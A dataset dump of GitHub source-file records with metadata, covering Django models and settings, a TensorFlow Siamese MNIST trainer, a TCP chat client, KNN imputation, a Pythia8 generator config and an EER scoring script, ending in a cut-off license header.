Dataset columns (each record below is one source file):

| column | type |
|---|---|
| blob_id | string (length 40) |
| directory_id | string (length 40) |
| path | string (2–616 chars) |
| content_id | string (length 40) |
| detected_licenses | list (0–69 items) |
| license_type | string (2 classes) |
| repo_name | string (5–118 chars) |
| snapshot_id | string (length 40) |
| revision_id | string (length 40) |
| branch_name | string (4–63 chars) |
| visit_date | timestamp[us] |
| revision_date | timestamp[us] |
| committer_date | timestamp[us] |
| github_id | int64 (2.91k–686M, nullable) |
| star_events_count | int64 (0–209k) |
| fork_events_count | int64 (0–110k) |
| gha_license_id | string (23 classes) |
| gha_event_created_at | timestamp[us] |
| gha_created_at | timestamp[us] |
| gha_language | string (213 classes) |
| src_encoding | string (30 classes) |
| language | string (1 class) |
| is_vendor | bool |
| is_generated | bool |
| length_bytes | int64 (2–10.3M) |
| extension | string (246 classes) |
| content | string (2–10.3M chars) |
| authors | list (length 1) |
| author_id | string (0–212 chars) |
7782f238bbd0d8255c48030ab2509aadec6ec136
|
a349c67e63c1cf8203c938ea1b1c9fa4f10252fa
|
/admin_back/branch/models.py
|
1342bccaf0c08d8a0de51e95cc92a7af26576c21
|
[] |
no_license
|
shubham2704/TopaAcademy_
|
a068b45e62f857786c0aa43f6c47dfea4cdd85d0
|
859ed88489dbabebf0318a53eabe91eae80297ca
|
refs/heads/master
| 2023-01-11T22:58:33.052314
| 2019-11-10T11:52:22
| 2019-11-10T11:52:22
| 220,782,125
| 0
| 0
| null | 2022-12-10T08:26:33
| 2019-11-10T11:45:51
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 659
|
py
|
from django.db import models
# Create your models here.
class branch_degree(models.Model):
degree_name = models.CharField(max_length=75)
degree_status = models.CharField(max_length=25)
date = models.DateField(auto_now_add=True)
program = models.CharField(max_length=100, default="")
duration = models.CharField(max_length=100, default="")
semester = models.CharField(max_length=100, default="")
class branchs(models.Model):
degree_id = models.IntegerField()
degree_name = models.CharField(max_length=75, default="")
branch_name = models.CharField(max_length=100)
date = models.DateField(auto_now_add=True)
|
[
"rs188282@gmail.com"
] |
rs188282@gmail.com
|
5d4d8e29a7cab2dccae8f4943f14e51687f2fb77
|
f4420cffb38e07800d3c5bdab01aada857fa0e22
|
/class3/class3_train.py
|
14864daf688899fc6e804a526969296a78037299
|
[] |
no_license
|
JShangS/Class_NUDT
|
8198c0d255ad3a76c02e32156eeb82c1d565011f
|
ea057d1b570965a2c900096611e2473e94ddf3c0
|
refs/heads/master
| 2020-03-16T06:04:20.633033
| 2018-07-18T15:36:17
| 2018-07-18T15:36:17
| 132,546,623
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,836
|
py
|
# This model does the following: given two MNIST images as input, it decides whether they show the same digit.
# Input, negative pair: X1 = an image of a 6, X2 = an image of a 9 -> output: 1
# Input, positive pair: X1 = an image of a 3, X2 = an image of a 3 -> output: 0
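# Summary of the graph built below: both inputs go through the same weights
# (a Siamese MLP, 784 -> 500 -> 10); Ew is the Euclidean distance between the
# two 10-d embeddings; the loss has the contrastive-energy form used in
# Chopra et al. (2005),
#     L = (1 - y) * (2/Q) * Ew^2 + 2 * y * Q * exp(-2.77 * Ew / Q),  Q = 5,
# with y = 0 for a positive pair and y = 1 for a negative pair, and
# calc_accuracy thresholds Ew at 2.5 to turn the distance into a decision.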
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
############## Balanced sampling #############
def balanced_batch(batch_x, batch_y, num_cls):
batch_size = len(batch_y)
pos_per_cls_e = round(batch_size / 2 / num_cls)
index = batch_y.argsort()
ys_1 = batch_y[index]
#print(ys_1)
num_class = []
pos_samples = []
neg_samples = set()
cur_ind = 0
for item in set(ys_1):
num_class.append((ys_1 == item).sum())
num_pos = pos_per_cls_e
while (num_pos > num_class[-1]):
num_pos -= 2
pos_samples.extend(
np.random.choice(
index[cur_ind:cur_ind + num_class[-1]], num_pos,
replace=False).tolist())
neg_samples = neg_samples | (set(
index[cur_ind:cur_ind + num_class[-1]]) - set(list(pos_samples)))
cur_ind += num_class[-1]
neg_samples = list(neg_samples)
x1_index = pos_samples[::2]
x2_index = pos_samples[1:len(pos_samples) + 1:2]
x1_index.extend(neg_samples[::2])
x2_index.extend(neg_samples[1:len(neg_samples) + 1:2])
p_index = np.random.permutation(len(x1_index))
x1_index = np.array(x1_index)[p_index]
x2_index = np.array(x2_index)[p_index]
r_x1_batch = batch_x[x1_index]
r_x2_batch = batch_x[x2_index]
r_y_batch = np.array(
batch_y[x1_index] != batch_y[x2_index], dtype=np.float)
r_y_batch = np.expand_dims(r_y_batch, 0)
return r_x1_batch, r_x2_batch, r_y_batch
########### Compute accuracy ################################
def calc_accuracy(pred, y):
accuracy = tf.equal(tf.to_float(pred > 2.5), y)
# accuracy = tf.equal(pred, y)
accuracy = tf.cast(accuracy, tf.float32)
accuracy = tf.reduce_mean(accuracy, name='Accuracy')
return sess.run(accuracy, feed_dict={x1: xs_t1, x2: xs_t2, y: y_ts})
################## Layer builder: 2 inputs, 2 outputs ###########################
def add_layer(inputs1,
inputs2,
in_size,
out_size,
Wname,
Bname,
activation_function=None):
Weights = tf.Variable(
tf.random_normal([in_size, out_size]),
name=Wname) #random_normal#zeros
biases = tf.Variable(tf.random_normal([1, out_size]), name=Bname)
Wx_plus_b1 = tf.matmul(inputs1, Weights) + biases
Wx_plus_b2 = tf.matmul(inputs2, Weights) + biases
if activation_function is None:
outputs1 = Wx_plus_b1
outputs2 = Wx_plus_b2
else:
outputs1 = activation_function(Wx_plus_b1)
outputs2 = activation_function(Wx_plus_b2)
return outputs1, outputs2
########## Load the data ################################
old_v = tf.logging.get_verbosity()
tf.logging.set_verbosity(tf.logging.ERROR)
mnist = input_data.read_data_sets('./data/mnist', one_hot=False)
# train_data = mnist.train.images # Returns np.array
# train_labels = np.asarray(mnist.train.labels, dtype=np.float)
# test_data = mnist.test.images
# test_labels = np.asarray(mnist.train.labels, dtype=np.float)
##################### Build the graph #####################
batch_size = 64
x1 = tf.placeholder(tf.float32, shape=[None, 784], name='input1')
x2 = tf.placeholder(tf.float32, shape=[None, 784], name='input2')
y = tf.placeholder(tf.float32, shape=[1, None], name='label')
### First layer ###################
L11, L12 = add_layer(x1, x2, 784, 500, 'W1', 'B1',
tf.nn.leaky_relu) #tf.nn.sigmoid
### Second layer ###################
L21, L22 = add_layer(
L11, L12, 500, 10, 'W2', 'B2',
tf.nn.leaky_relu) #tf.nn.softmax #tf.nn.relu#tf.nn.leaky_relu
############### Compute Ew and the prediction ##################
Ew = tf.sqrt(tf.reduce_sum(tf.square(tf.subtract(L21, L22)), 1), name='Ew')
pred = Ew #tf.nn.sigmoid(Ew)
# pred = tf.to_float(tf.equal(tf.argmax(L21, 1), tf.argmax(L22, 1)))
############loss#############
Q = tf.constant(5, dtype=tf.float32)
# loss = tf.reduce_mean(tf.square(y - pred))
loss = tf.add(
tf.multiply(
tf.multiply(tf.subtract(1.0, y), tf.div(2.0, Q)), tf.square(Ew)),
tf.multiply(
tf.multiply(tf.multiply(2.0, y), Q),
tf.exp(tf.multiply(tf.div(-2.77, Q), Ew))))
lr = 1e-2
optimizer = tf.train.AdamOptimizer(
learning_rate=lr) #AdamOptimizer#GradientDescentOptimizer
train = optimizer.minimize(loss=(loss)) #tf.reduce_mean
################ Session ############################
ACC = []
saver = tf.train.Saver()
with tf.Session() as sess:
iter = 20001
sess.run(tf.global_variables_initializer())
for itera in range(iter):
batch_x, batch_y = mnist.train.next_batch(batch_size * 2)
xs_1, xs_2, y_s = balanced_batch(batch_x, batch_y, num_cls=10)
_, l, y_pred, rEw = sess.run(
[train, loss, pred, Ew], feed_dict={
x1: xs_1,
x2: xs_2,
y: y_s
})
if itera % 1000 == 0:
print('\n')
print('第', itera, '次迭代,损失为: ', sess.run(tf.reduce_mean(l)))
print(y_s.reshape((1, -1)))
print('Ew', rEw, '\n')
####################### Test #############################
batch_x, batch_y = mnist.test.next_batch(batch_size * 2)
xs_t1, xs_t2, y_ts = balanced_batch(batch_x, batch_y, num_cls=10)
####### Accuracy ########################
# ACC.append(calc_accuracy(pred, y))
ACC = calc_accuracy(pred, y)
print('准确率 ACC =', ACC)
saver.save(sess, './model_class3/my_test_model')
tf.logging.set_verbosity(old_v)
|
[
"424431687@qq.com"
] |
424431687@qq.com
|
9ac8b9102cb25d5b191859e8416350e58ed239ce
|
915b1364a4e6df3c5f2877b73204d91f1b60a7b6
|
/alfred/services/petition_statuses.py
|
ae8b13d757678328f096a3f60e8ae91d61271341
|
[] |
no_license
|
MariaHajj/alfred
|
5891bcb27b54eb865594d706973bbf3ed66a356e
|
fad3da69d45773818a36f73c9446fa81ff515199
|
refs/heads/master
| 2023-09-03T19:29:47.593299
| 2021-10-22T21:31:32
| 2021-10-22T21:31:32
| 336,099,114
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,344
|
py
|
from alfred.dao.petition_statuses import petition_status_dao,\
PetitionStatus, db
class PetitionStatusService():
__instance__ = None
def __init__(self):
if PetitionStatusService.__instance__ is None:
PetitionStatusService.__instance__ = self
else:
raise Exception("You cannot create another"
"PetitionStatusService class")
@staticmethod
def get_instance():
if not PetitionStatusService.__instance__:
PetitionStatusService()
return PetitionStatusService.__instance__
def create_petition_status(self, name, description):
if (name is None) or (description is None):
return None
petition_status = petition_status_dao.get_by_name(name=name)
if petition_status is None:
petition_status = PetitionStatus(name=name,
description=description)
petition_status_dao.add(petition_status)
return petition_status
return None
def update_petition_status(self, petition_status_id,
name=None, description=None):
if (petition_status_id is None):
return False
if (name is None) and (description is None):
return False
try:
petition_status = petition_status_dao\
.get_by_id(petition_status_id=petition_status_id)
if name:
petition_status.name = name
if description:
petition_status.description = description
db.session.commit()
return True
except Exception:
return False
def delete_petition_status(self, petition_status_id):
if petition_status_id is None:
return False
try:
petition_status = petition_status_dao\
.get_by_id(petition_status_id=int(petition_status_id))
if petition_status:
petition_status_dao\
.delete_petition_status_by_id(petition_status_id)
return True
else:
return False
except Exception:
return False
petition_status_service = PetitionStatusService.get_instance()
|
[
"mariahajj5@gmail.com"
] |
mariahajj5@gmail.com
|
a4a54fab9bf8da2d7cc0958d3f1e07bf28e76a48
|
92c66c64b70bc41e60252b48dafd58b2c0d1a39f
|
/Python/Testing/KNNImpute.py
|
2c3e15d3a40a3af6228c4a0188e314e6248e6569
|
[] |
no_license
|
matt-ramcharan/unknownPrimary
|
360bebc847a3cfa6312970c5cc74256240afc39a
|
d83f45c8e08ae2857b057070e665a6dfb7ad35e1
|
refs/heads/master
| 2021-06-22T07:40:15.887110
| 2021-02-24T21:25:49
| 2021-02-24T21:25:49
| 194,879,144
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 687
|
py
|
import pandas as pd
ds = pd.read_csv('/home/matt/Documents/TechnicalProject/unknownPrimary/Python/DataFormatting/FullDataColoRectal93.csv')
Y = ds['Label']
from sklearn.preprocessing import LabelEncoder
labelencoder_y = LabelEncoder()
Y = labelencoder_y.fit_transform(Y)
# print(Y)
X = pd.array(ds.drop('Label', axis=1), dtype='Int64')
from numpy import NaN
mask = X==0
# X=X.astype(pd.Int64Dtype())
X[mask] = NaN
from fancyimpute import KNN
# X is the complete data matrix
# X_incomplete has the same values as X except that a subset have been replaced with NaN
# Use the 3 nearest rows which have that feature to fill in each row's missing features
X_filled_knn = KNN(k=3).fit_transform(X.T)
pass
|
[
"matthew.a.ramcharan@gmail.com"
] |
matthew.a.ramcharan@gmail.com
|
ef9c532d9518673c77b85d20f3fe332064e3096a
|
b6699361cea596afbafcff40056e12a3ccadb590
|
/nebula_utils/nebula_utils/persist_compute/utils.py
|
2f9feffcaa4a8285a2abe800ba2837e256eb6e2b
|
[
"Apache-2.0"
] |
permissive
|
benhe119/python_lib
|
4c6ba3468ef380eadc5ab65401052aba224801db
|
e2d4052de04c82cb7bccd08042f28db824cab442
|
refs/heads/master
| 2020-08-09T10:09:59.368521
| 2019-03-29T02:21:55
| 2019-03-29T02:21:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,722
|
py
|
# -*- coding: utf-8 -*-
Group_Key_To_Dimension = dict(
c_ip = 'ip',
uid = 'user',
page = 'page',
did = 'did',
# c_ipc = 'ipc',
)
Avail_Dimensions = tuple(Group_Key_To_Dimension.values())
# dimension : variable_name (the variable name used to look up the click count)
Click_Variable_Names = dict(
ip='ip__visit__dynamic_count__1h__slot',
did='did__visit__dynamic_count__1h__slot',
user='user__visit__dynamic_count__1h__slot',
page='page__visit__dynamic_count__1h__slot'
)
IP_Stat_Type = 2
IPC_Stat_Type = 3
DID_Stat_Type = 4
UID_Stat_Type = 5
PAGE_Stat_Type = 6
Dimension_Stat_Prefix = dict(
ip = IP_Stat_Type,
ipc = IPC_Stat_Type,
did = DID_Stat_Type,
user = UID_Stat_Type,
page = PAGE_Stat_Type,
)
Category = ['VISITOR', 'ACCOUNT', 'ORDER',
'TRANSACTION', 'MARKETING', 'OTHER']
Scene_Variable_Names = dict(
VISITOR='total__visit__visitor_incident_count__1h__slot',
ACCOUNT='total__visit__account_incident_count__1h__slot',
ORDER='total__visit__order_incident_count__1h__slot',
TRANSACTION='total__visit__transaction_incident_count__1h__slot',
MARKETING='total__visit__marketing_incident_count__1h__slot',
OTHER='total__visit__other_incident_count__1h__slot'
)
def get_dimension(group_key_name):
"""
Map a groupby key to the corresponding dimension key used in the Stat_Dict statistics.
"""
return Group_Key_To_Dimension.get(group_key_name, None)
def dict_merge(src_dict, dst_dict):
"""
Merge dst_dict into src_dict, accumulating values key by key.
Behaviour for the different value types:
>>> s = dict(a=1,b='2')
>>> d = {'b': 3, 'c': 4}
>>> dict_merge(s,d)
>>> t = {'a': 1, 'b': 5, 'c': 4}
>>> s == t
True
>>> s = dict(a=set([1,2]), )
>>> d = dict(a=set([2, 3]),)
>>> dict_merge(s,d)
>>> t = {'a':set([1,2,3])}
>>> s == t
True
>>> s = dict(a={'a':1, 'b':2})
>>> d = dict(a={'a':1, 'b':2})
>>> dict_merge(s, d)
>>> t = dict(a={'a':2, 'b':4})
>>> s == t
True
"""
for k,v in dst_dict.iteritems():
if not src_dict.has_key(k):
src_dict[k] = v
else:
if isinstance(v, (basestring, int, float)):
src_dict[k] = int(v) + int(src_dict[k])
elif isinstance(v, set):
assert type(v) == type(src_dict[k]), 'key %s,dst_dict value: %s type: %s, src_dict value: %s type:%s' % (k, v, type(v), src_dict[k], type(src_dict[k]))
src_dict[k].update(v)
elif isinstance(v, dict):
assert type(v) == type(src_dict[k]), 'key %s,dst_dict value: %s type: %s, src_dict value: %s type:%s' % (k, v, type(v), src_dict[k], type(src_dict[k]))
dict_merge(src_dict[k], v)
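# A minimal Python 3 rendering of dict_merge (a sketch for reference only; the
# function above targets Python 2 via iteritems/has_key/basestring, and the
# name dict_merge_py3 is introduced here purely for illustration):
def dict_merge_py3(src_dict, dst_dict):
    for k, v in dst_dict.items():
        if k not in src_dict:
            src_dict[k] = v
        elif isinstance(v, (str, int, float)):
            src_dict[k] = int(v) + int(src_dict[k])
        elif isinstance(v, set):
            src_dict[k].update(v)
        elif isinstance(v, dict):
            dict_merge_py3(src_dict[k], v)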
|
[
"zengjinping@threathunter.cn"
] |
zengjinping@threathunter.cn
|
d268885b06e5ecfc77a921f7ad6c72e5960b568d
|
7465b8a0e9230c0fbfaa6fca61cd37a8f9808867
|
/python/file_read.py
|
407ad5fef985af2b41efa8472fa7a9c0a23340be
|
[] |
no_license
|
leventarican/cookbook
|
64ac76f64ae2277e4a35ed9e0ec39d57296ec84c
|
44ae9ffe8ec50dc0a65d8c23a7971d93b7240886
|
refs/heads/master
| 2023-07-21T15:24:30.156023
| 2023-03-24T23:26:50
| 2023-03-24T23:26:50
| 188,314,816
| 1
| 1
| null | 2023-07-07T21:43:58
| 2019-05-23T22:26:39
|
Java
|
UTF-8
|
Python
| false
| false
| 165
|
py
|
import os
file = 'tmp.file'
file_check = os.path.isfile(file)
print(f'is file: {file_check}')
if file_check:
text = open(file).read().rstrip()
print(text)
|
[
"levent@protonmail.com"
] |
levent@protonmail.com
|
d1a6d8596ce7eb63d9e60c8828b8e99dc7f0505f
|
1431d485f0d2d26fd1205de928410e2fd0177999
|
/egift/settings.py
|
fa0f0f07e155ba654eb85ad69aac32f19be4adf7
|
[] |
no_license
|
ryanagao/egift
|
38feff9f3e30505724d95945ce78d24db1f030e3
|
bcd92afe5079f2631ac12f058e9c865d27f05345
|
refs/heads/master
| 2022-10-28T11:46:50.641772
| 2020-06-09T09:03:51
| 2020-06-09T09:03:51
| 268,835,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,429
|
py
|
"""
Django settings for egift project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '9)-mb9o&mb3hte+9l*qiftoa=-n)c*sudx7d_(ut+*yt-koxx^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['192.168.1.50']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# 'users',
# 'profiles',
# 'merchants',
'egiftadmin',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'egift.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'egift.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'egift',
'USER': 'ryanagao',
'PASSWORD': 'ryan1996',
'HOST': 'localhost',
'PORT': '3306',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
LOGIN_URL = '/login'
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'egiftadmin/media')
AUTH_USER_MODEL = 'egiftadmin.User'
AUTH_PROFILE_MODULE = 'eegiftadmin.User'
|
[
"ryanagao@yahoo.com"
] |
ryanagao@yahoo.com
|
a0cf638570fd5e5ca668f87fea26dba6aa801a6c
|
f59d214b39cde79ae1785dd85c2302e61f88a6a9
|
/mailer/migrations/0001_initial.py
|
698297748dbee433427c3f4d76abbf71fdbf7c3e
|
[
"MIT"
] |
permissive
|
Fyodor-Mityanin/mailgunner
|
24c9502c1fd3b770f67f9e84a4590849a1dba94d
|
4292819383ee2d8a90ef1b02d5f2053c1b889f42
|
refs/heads/main
| 2023-07-15T02:39:55.061345
| 2021-08-16T16:38:18
| 2021-08-16T16:38:18
| 395,543,991
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,774
|
py
|
# Generated by Django 3.2.6 on 2021-08-13 11:49
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Email',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=254, unique=True, verbose_name='Почта')),
('name', models.CharField(max_length=20, verbose_name='Имя адресата')),
('surname', models.CharField(max_length=20, verbose_name='Фамилия адресата')),
('birth_date', models.DateTimeField(blank=True, verbose_name='День рождения адресата')),
],
options={
'verbose_name': 'Почта',
},
),
migrations.CreateModel(
name='Sent_mail',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('send_date', models.DateTimeField(auto_now_add=True, verbose_name='Время отправки')),
('is_read', models.CharField(max_length=20, verbose_name='Имя адресата')),
('email', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sends', to='mailer.email', verbose_name='Почта')),
],
options={
'verbose_name': 'Отправленное письмо',
'verbose_name_plural': 'Отправленные письма',
},
),
]
|
[
"79231292918@ya.ru"
] |
79231292918@ya.ru
|
07058386513c7f2b9211d4ef939667c38b5caa96
|
22f52f8935932d7702ab8c69c206e50e658a4229
|
/client.py
|
c2bc6a02d6d934d18afddb117bce75c948bae00f
|
[] |
no_license
|
thomaskaridis91/TCP-chat-room-Python
|
066f12f41db6d8a023c238f0ea0df351b880a4e0
|
4a2b1a7bef57252ed4ba28daeeec09ddf97a3727
|
refs/heads/main
| 2023-02-03T01:29:04.967565
| 2020-12-15T16:25:32
| 2020-12-15T16:25:32
| 321,042,702
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,462
|
py
|
import socket
import threading
nickname = input("Choose a nickname: ")
if nickname == 'admin':
password = input("Enter password for admin: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #socket initialization
client.connect(('127.0.0.1', 7976)) #connecting client to server
stop_thread = False
def receive(): #making valid connection
while True:
global stop_thread
if stop_thread:
break
try:
message = client.recv(1024).decode('ascii')
if message == 'NICK':
client.send(nickname.encode('ascii'))
next_message = client.recv(1024).decode('ascii')
if next_message == 'password':
client.send(password.encode('ascii'))
if client.recv(1024).decode('ascii') == 'Refuse access':
print("Connection was denied")
stop_thread = True
elif next_message == 'Ban':
print('Connection refused because user is banned')
client.close()
stop_thread = True
else:
print(message)
except: #case on wrong ip/port details
print("An error occurred!")
client.close()
break
def write():
while True:
if stop_thread:
break ##checking messages if client is banned or kicked
message = '{}: {}'.format(nickname, input(''))
if message[len(nickname)+2:].startswith('/'):
if nickname == 'admin':
if message[len(nickname)+2:].startswith('/kick'):
client.send(f'Kick {message[len(nickname)+2+6:]}'.encode('ascii'))
elif message[len(nickname)+2:].startswith('/ban'):
client.send(f'Ban {message[len(nickname)+2+5:]}'.encode('ascii'))
else:
print("Can't perform action -- no admin privileges")
else:
client.send(message.encode('ascii')) #message layout
receive_thread = threading.Thread(target=receive) #receiving multiple messages
receive_thread.start()
write_thread = threading.Thread(target=write) #sending messages
write_thread.start()
|
[
"noreply@github.com"
] |
thomaskaridis91.noreply@github.com
|
598e560d763656adbc9a89350e1a41a550753672
|
0fccee4c738449f5e0a8f52ea5acabf51db0e910
|
/genfragments/EightTeV/ADD/ADDMonoJet_Pythia8_8TeV_d2_MD4_Tune4C_cfi.py
|
b5abcb126193f8ade437774aa00cf6cd962f7ded
|
[] |
no_license
|
cms-sw/genproductions
|
f308ffaf3586c19b29853db40e6d662e937940ff
|
dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4
|
refs/heads/master
| 2023-08-30T17:26:02.581596
| 2023-08-29T14:53:43
| 2023-08-29T14:53:43
| 11,424,867
| 69
| 987
| null | 2023-09-14T12:41:28
| 2013-07-15T14:18:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,055
|
py
|
import FWCore.ParameterSet.Config as cms
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1.0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(8000.0),
maxEventsToPrint = cms.untracked.int32(0),
PythiaParameters = cms.PSet(
pythia8_unparticle = cms.vstring(
'Tune:pp = 5',
'PDF:pSet = 5',
'ExtraDimensionsLED:monojet = on',
'ExtraDimensionsLED:CutOffmode = 1',
'ExtraDimensionsLED:t = 0.5',
'ExtraDimensionsLED:n = 2',
'ExtraDimensionsLED:MD = 4000.',
'5000039:m0 = 1200.',
'5000039:mWidth = 1000.',
'5000039:mMin = 1.',
'5000039:mMax = 13990.',
'PhaseSpace:pTHatMin = 80.',
'PartonLevel:MI = on',
'PartonLevel:ISR = on',
'PartonLevel:FSR = on',
'ParticleDecays:limitTau0 = on',
'ParticleDecays:tauMax = 10'
),
parameterSets = cms.vstring('pythia8_unparticle')
)
)
|
[
"sha1-481a5a2ac9973b7cab990140e7a395466f50a31e@cern.ch"
] |
sha1-481a5a2ac9973b7cab990140e7a395466f50a31e@cern.ch
|
232fc7c6fe140c92490d86fdcbc5cc5b0dd995d0
|
be7c4427047adcde81d76382b21bb6e1df8b6994
|
/data_processing/compute_EER.py
|
5ea742c5ac92c02e39bc9665e2dd31cd1109c4d8
|
[
"MIT"
] |
permissive
|
twistedmove/multistream-CNN
|
3d1d1be983b940f8a843349774866f0ecbc11a0c
|
a21bfe9f41d586d7e51f1ce345f11ecfb8df66e7
|
refs/heads/main
| 2023-02-13T14:21:39.601812
| 2021-01-05T15:29:06
| 2021-01-05T15:29:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,030
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# USAGE: python compute_EER.py --ground_truth data/trials.txt --prediction data/scores.txt
import os
import numpy
import argparse
import pdb
from scipy.optimize import brentq
from sklearn.metrics import roc_curve
from scipy.interpolate import interp1d
# ==================== === ====================
def GetArgs():
parser = argparse.ArgumentParser(description="VoxSRC")
parser.add_argument('--ground_truth', type=str, default='veriset/trials.txt',
help="Input trials file, with columns of the form <t0/1> <utt1> <utt2>")
parser.add_argument('--prediction', type=str, default='veriset/normalized-scores/stream1.txt',
help="Input scores file, with columns of the form <score> <utt1> <utt2>")
parser.add_argument('--positive', type=int, default=1, help='1 if higher is positive; 0 if lower is positive')
# opt = parser.parse_args()
args = parser.parse_args()
return args
# ==================== === ====================
def calculate_eer(y, y_score, pos):
# y denotes groundtruth scores,
# y_score denotes the prediction scores.
fpr, tpr, thresholds = roc_curve(y, y_score, pos_label=pos)
eer = brentq(lambda x: 1. - x - interp1d(fpr, tpr)(x), 0., 1.)
thresh = interp1d(fpr, thresholds)(eer)
return eer, thresh
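# Note on calculate_eer above: the equal error rate is the operating point at
# which the false positive rate equals the false negative rate (1 - TPR).
# Writing x for the FPR and using interp1d(fpr, tpr) as TPR(x), that point is
# the root of f(x) = 1 - x - TPR(x), which brentq locates on [0, 1]; the
# matching decision threshold is then read off with interp1d(fpr, thresholds).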
# ==================== === ====================
def read_score(filename):
scores_file = open(filename, 'r').readlines()
scores = []
# you may also want to remove whitespace characters like `\n` at the end of each line
for line in scores_file:
score, utt1, utt2 = line.rstrip().split()
scores.append(float(score))
return scores
# ==================== === ====================
def main():
args = GetArgs()
y = read_score(args.ground_truth)
y_score = read_score(args.prediction)
eer, thresh = calculate_eer(y, y_score, args.positive)
print('EER : %.3f%%' % (eer * 100))
if __name__ == "__main__":
main()
|
[
"chenshenpe@163.com"
] |
chenshenpe@163.com
|
9110b94cd649c0cd67ec03c1e03f62dd6a7243d9
|
e37fd2fd6a09a9b28c18df6df9d7892357f0762c
|
/routines/randMat.py
|
741e62c15b93bf610a752e24120413296a816e3a
|
[] |
no_license
|
kjerfire/math5610
|
0238f566723d96df5ca7de1393a27d9c6a50efba
|
37a0693c957c3ce9bfa169c4ca5955bdcd72f4ac
|
refs/heads/master
| 2020-04-15T07:00:37.756127
| 2019-05-01T22:49:35
| 2019-05-01T22:49:35
| 164,483,734
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 117
|
py
|
import random
def randMat(m, n):
return [[random.random() for i in range(n)] for j in range(m)]
|
[
"noreply@github.com"
] |
kjerfire.noreply@github.com
|
4c9b0e631e8b0ca21e84f2aacadd30b83f22bd34
|
0549e79fc24ff13b06a353fade3c30e663e2e294
|
/dev/gobblin-jira-version
|
5796c543733ffcdf9ccb254819f4ba7889579f2f
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"xpp"
] |
permissive
|
thaiphamquoc/incubator-gobblin
|
2b7f59b92b057f8ffc15eebb7908ff4125075094
|
8879cdec2680e9e748d7e89f5cef5d72110c1c07
|
refs/heads/master
| 2021-09-06T05:11:29.568067
| 2018-02-02T15:54:44
| 2018-02-02T15:54:44
| 119,752,509
| 1
| 0
| null | 2018-01-31T22:37:22
| 2018-01-31T22:37:22
| null |
UTF-8
|
Python
| false
| false
| 5,524
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
